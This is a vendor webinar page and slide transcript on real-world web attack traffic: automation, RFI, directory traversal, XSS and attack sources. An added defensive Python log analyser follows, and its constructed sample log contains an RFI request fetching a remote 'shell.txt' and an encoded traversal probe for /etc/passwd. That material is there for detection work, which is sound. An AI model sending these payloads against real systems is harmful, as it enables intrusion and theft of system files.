Companies of all sizes face a universal security threat from today's organized hacking industry. Why? Hackers are decreasing costs and expanding their reach with tools and technologies that allow for automated attacks against Web applications. The hacker’s arsenal includes armies of zombies (i.e. global networks of compromised computers) that access large amounts of personal and corporate data that can be sold on the black market.
As part of Imperva's ongoing Hacker Intelligence Initiative, we monitored and categorized individual attacks across the Internet over a period of six months. This webinar will detail the results of this research, which encompasses attacks witnessed via onion router (TOR) traffic as well as attacks targeting 30 different enterprise and government Web applications. The research includes:
• Insight into how automation allows hackers to generate 7 attacks per second
• Overview of the top vulnerabilities exploited by hackers: directory traversal, cross-site scripting (XSS), SQL injection, and remote file inclusion (RFI)
• Detail into which countries generate the most malicious activity
• Recommendations, both technical and nontechnical, for security teams and executives
1. The State of Application Security:
What Hackers Break
Amichai Shulman, CTO, Imperva
2. Agenda
The current state of Web vulnerabilities
Studying hackers
+ Why? Prioritizing defenses
+ How? Methodology
Analyzing real-life attack traffic
+ Key findings
+ Take-aways
Technical recommendations
3. Imperva Overview
Imperva’s mission is simple:
Protect the data that drives business
The leader in a new category:
Data Security
HQ in Redwood Shores CA; Global Presence
+ Installed in 50+ Countries
1,200+ direct customers; 25,000+ cloud users
+ 3 of the top 5 US banks
+ 3 of the top 10 financial services firms
+ 3 of the top 5 Telecoms
+ 2 of the top 5 food & drug stores
+ 3 of the top 5 specialty retailers
+ Hundreds of small and medium businesses
4. Today’s Presenter
Amichai Shulman – CTO Imperva
Speaker at industry events
+ RSA, Sybase Techwave, Info Security UK, Black Hat
Lecturer on Info Security
+ Technion - Israel Institute of Technology
Former security consultant to banks and financial services firms
Leads the Application Defense Center (ADC)
+ Discovered over 20 commercial application vulnerabilities
– Credited by Oracle, MS-SQL, IBM and others
Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
5. WhiteHat Security Top Ten—2010
Percentage likelihood of a website having at least one vulnerability, sorted by class
6. The Situation Today
# of websites: 357,292,065 (estimated: July 2011)
× # of vulnerabilities: 230
× 1%
= 821,771,600 vulnerabilities in active circulation
7. The Situation Today
# of websites: 357,292,065 (estimated: July 2011)
× # of vulnerabilities: 230
× 1%
= 821,771,600 vulnerabilities in active circulation
But which will be exploited?
8. Studying Hackers
Focus on actual threats
+ Focus on what hackers want, helping good guys prioritize
+ Technical insight into hacker activity
+ Business trends of hacker activity
+ Future directions of hacker activity
Eliminate uncertainties
+ Active attack sources
+ Explicit attack vectors
+ Spam content
Devise new defenses based on real data
+ Reduce guess work
9. Understanding the Threat Landscape: Methodology
Analyze hacker tools and activity
Tap into hacker forums
Record and monitor hacker activity
+ Categorized attacks across 30 applications
+ Monitored TOR traffic
+ Recorded over 10M suspicious requests
+ 6 months: December 2010-May 2011
10. Lesson #1: Automation is Prevailing
Attacks are automated
+ Botnets
+ Mass SQL Injection attacks
+ Google dorks
12. Lesson #1: Automation is Prevailing
Apps under automated attack: 25,000 attacks per hour ≈ 7 per second
On average: 27 attacks per hour ≈ 1 attack per 2 min.
13. Lesson #1: Automation is Prevailing
Apps under automated attack: 25,000 attacks per hour ≈ 7 per second
On average: 27 attacks per hour ≈ 1 attack per 2 minutes
Take-away: Get ready to fight automation
17. Lesson #2B: The “Unfab” Four
Remote File Inclusion
Analyzing the parameters and source of an RFI attack enhances common signature-based attack detection.
22. Lesson #2D: The “Unfab” Four
Cross Site Scripting – Zooming into Search Engine Poisoning
http://HighRankingWebSite+PopularKeywords+XSS
…
http://HighRankingWebSite+PopularKeywords+XSS
23. Lesson #2D: The “Unfab” Four
Cross Site Scripting
New Search Engine Indexing Cycle
24. Lesson #2: The “Unfab” Four
Take-away: Protect against these common attacks
These may seem obvious common attacks, but RFI and DT do not even appear in OWASP’s top 10 list.
25. Directory Traversal Missing from OWASP Top 10?
OWASP Rationale:
Directory traversal is covered in the OWASP Top Ten 2010 through the more general case, A4, Insecure Direct Object Reference.
“Insecure Direct Object Reference” is different than “Directory Traversal” because in the latter access is made to a resource that, to begin with, should not have been available through the application.
26. Remote File Inclusion Missing from OWASP Top 10?
A3, OWASP Top 10 2007 - Malicious File Execution. Removed in the OWASP Top 10 2010.
OWASP Rationale:
REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.
27. Lesson #3: The U.S. is the Source of Most Attacks
We witnessed 29% of attack events originating from 10 sources.
28. Lesson #3: The U.S. is the Source of Most Attacks
Take-away:
Sort traffic based on reputation
We witnessed 29% of attack events originating from 10 sources.
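Lessons 1 through 3 above (automation, the “unfab four” with RFI and directory traversal, and sorting traffic by source reputation) describe what a defender should look for in attack traffic. The following Python is an added example written for this page, not Imperva’s code or anything shown in the webinar: it runs a first detection pass over access-log lines, classifying RFI and directory traversal from the request parameters rather than a fixed signature, tagging sources on a reputation list, and flagging sources whose request rate points to automation. Every log line, IP address, host name, the `BAD_REPUTATION` set, `APP_HOSTS` and the burst threshold are constructed for illustration.

```python
"""Added example: a defender's first pass over web-server access-log lines.
Classifies RFI and directory traversal from request parameters, tags sources
on a reputation list, and flags per-minute bursts that indicate automation.
All log lines, addresses, hosts and thresholds below are constructed."""
import re
from collections import Counter, defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, unquote, urlsplit

# Simplified combined-log layout (constructed):
#   <client ip> [<timestamp>] "<method> <request-target> HTTP/1.x" <status>
LOG_RE = re.compile(r'^(\S+) \[([^\]]+)\] "(\S+) (\S+) HTTP/[\d.]+" (\d{3})$')

APP_HOSTS = {"www.example.com"}                  # hosts the app may legitimately reference (assumed)
BAD_REPUTATION = {"203.0.113.5", "192.0.2.200"}  # constructed reputation feed
BURST_THRESHOLD_PER_MINUTE = 30                  # far above the 27-per-hour average from the study


def build_sample_log():
    """Constructed traffic: an automated RFI burst, one traversal probe, one benign request."""
    lines = []
    for sec in range(40):  # 40 identical requests inside a single minute
        lines.append(f'203.0.113.5 [15/May/2011:10:00:{sec:02d} +0000] '
                     f'"GET /index.php?page=http://198.51.100.77/shell.txt? HTTP/1.1" 200')
    lines.append('192.0.2.10 [15/May/2011:10:05:12 +0000] '
                 '"GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404')
    lines.append('192.0.2.44 [15/May/2011:10:06:03 +0000] "GET /about.html HTTP/1.1" 200')
    return lines


def parse_line(line):
    """Turn one log line into a dict, or None if it does not match the layout."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "target": target, "status": int(status)}


def looks_like_rfi(value):
    """An absolute URL to a host the application does not own is the RFI tell-tale."""
    parts = urlsplit(value)
    return (parts.scheme in ("http", "https", "ftp") and bool(parts.netloc)
            and parts.hostname not in APP_HOSTS)


def escapes_root(value):
    """True if '..' segments in the value climb above its starting directory."""
    depth = 0
    for part in re.split(r"[\\/]+", value):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part and part != ".":
            depth += 1
    return False


def classify(target):
    """Return the set of attack labels for one request target (path + query)."""
    labels = set()
    split = urlsplit(target)
    # Decode twice so single- and double-encoded traversal sequences are both seen.
    candidates = [unquote(unquote(split.path))]
    for _, value in parse_qsl(split.query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl already decoded once
        candidates.append(decoded)
        if looks_like_rfi(decoded):
            labels.add("rfi")
    if any(escapes_root(c) for c in candidates):
        labels.add("directory_traversal")
    return labels


def automated_sources(events, threshold=BURST_THRESHOLD_PER_MINUTE):
    """IPs that exceed `threshold` requests within any single minute."""
    per_minute = Counter((e["ip"], e["time"].replace(second=0)) for e in events)
    return {ip for (ip, _), n in per_minute.items() if n > threshold}


def analyze(lines):
    """Map each source IP to the union of labels attached to its requests."""
    events = [e for e in map(parse_line, lines) if e]
    bursty = automated_sources(events)
    report = defaultdict(set)
    for e in events:
        labels = classify(e["target"])
        if e["ip"] in BAD_REPUTATION:
            labels.add("bad_reputation")
        if e["ip"] in bursty:
            labels.add("automated")
        report[e["ip"]] |= labels
    return dict(report)


if __name__ == "__main__":
    for ip, labels in sorted(analyze(build_sample_log()).items()):
        print(f"{ip:<14} {', '.join(sorted(labels)) or 'clean'}")
```

The parameter-level checks are what the RFI slide means by looking at parameters rather than only signatures: a value that parses as an absolute URL to a foreign host is flagged whatever string it carries, and traversal is detected by walking the decoded path segments rather than matching a literal `../`. The burst threshold and reputation list are stand-ins for the rate and intelligence feeds a real deployment would source externally.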
29. Organizations like these Funded a $27B Security Market in 2010…
…All had major breaches in 2011. What’s wrong?
30. Threat vs. Spending Market Dislocation
The data theft industry is estimated at $1 trillion annually
Organized crime is responsible for 85% of data breaches 1
Threats: “In 2010, 76% of all data breached was from servers and applications” 1
Spending: “Yet well over 90% of the $27 billion spent on security products was on traditional security” 2
1 2011 Data Breach Investigations Report (Verizon RISK Team in conjunction with the US Secret Service & Dutch High Tech Crime Unit)
2 Worldwide Security Products 2011-2014 Forecast (IDC - February 2011)
31. Summary
Deploy security solutions that deter automated attacks
Detect known vulnerability attacks
Acquire intelligence on malicious sources and apply it in real time
Participate in a security community and share data on attacks
32. Summary
“Foreknowledge cannot be gotten from ghosts and spirits, cannot be had by analogy, cannot be found out by calculation. It must be obtained from people, people who know the conditions of the enemy” 1
1 Sun Tzu – The Art of War
33. Imperva: Our Story in 60 Seconds
Attack Protection
Virtual Patching
Reputation Controls
Usage Audit
Rights Management
Access Control
34. Webinar Materials
Get LinkedIn to Imperva Data Security Direct for…
Answers to Attendee Questions
Post-Webinar Discussions
Webinar Recording Link
Much more…